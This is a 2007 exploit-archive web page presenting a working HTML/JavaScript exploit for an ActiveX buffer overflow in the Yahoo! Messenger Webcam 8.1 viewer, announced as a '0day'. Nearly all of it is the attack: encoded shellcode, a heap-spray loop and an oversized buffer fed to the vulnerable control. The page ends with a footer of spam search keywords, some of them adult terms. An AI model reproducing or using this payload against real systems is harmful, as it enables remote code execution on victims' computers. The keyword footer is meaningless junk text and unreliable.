about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2




2007-06-08 Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2
Rated as : High Risk

This affects the viewer ywcvwr.dll with yahoo messenger
  latest version tested.
  Fixed bug in last post
  (x=0;xi<800;x++) should be  (x=0; x<800; x++)
   
  Here is your 2nd 0day!!!
 
link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856

   
<html> 
<object classid='clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277'
id='target'></object> 
<script>
shellcode =
unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + 
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + 
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + 
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + 
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + 
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + 
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + 
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + 
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + 
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + 
"%uCC4A%uD0FF"); 
bigblock = unescape("%u9090%u9090"); 
headersize = 20; 
slackspace = headersize+shellcode.length 
while (bigblock.length<slackspace) bigblock+=bigblock; 
fillblock = bigblock.substring(0, slackspace); 
block = bigblock.substring(0, bigblock.length-slackspace); 
while(block.length+slackspace<0x40000) block = block+block+fillblock; 
memory = new Array(); 
for (x=0; x<800; x++) memory[x] = block + shellcode; 
var buffer = 'x0a'; 
while (buffer.length < 5000) buffer+='x0ax0ax0ax0a'; 
target.server = buffer; 
target.receive(); 
</script> 
</html> 
securitydot.net - 2007-06-08

Advertising

Copyright 2007, SecurityDot
Sat, 07 Nov 2009 22:47:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
samba smbd www.celebr kaviamadav Amateurpor Nudefilm.C kec SEX FEER my first s Www.teffin free sexy vidieo 17 t913t Video.3gp www.asian4 www.dglsqq invision P Videosxxxg teenel.com vetty free Namithapic Www.Tamil autorank Condition Freepronvi pinkward.c xoops 2.2 arebsex sxe inject greny porn microsoft Apachel 1. gameguad www.aaaaaa Antarvasna Antarvasna nudebollyw wwwxxx89.c WWW.89.WOR Www 19 pho phpnuke ad phpnuke ad WWW.PLEY B www.gotone lezbians f www.sxx.co foto bugil rpc dcom g www.sex g shop.ebdoo Wwwvideoxx